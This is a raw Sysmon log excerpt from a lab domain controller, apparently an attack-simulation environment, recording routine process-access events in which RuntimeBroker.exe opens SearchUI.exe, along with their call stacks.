12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
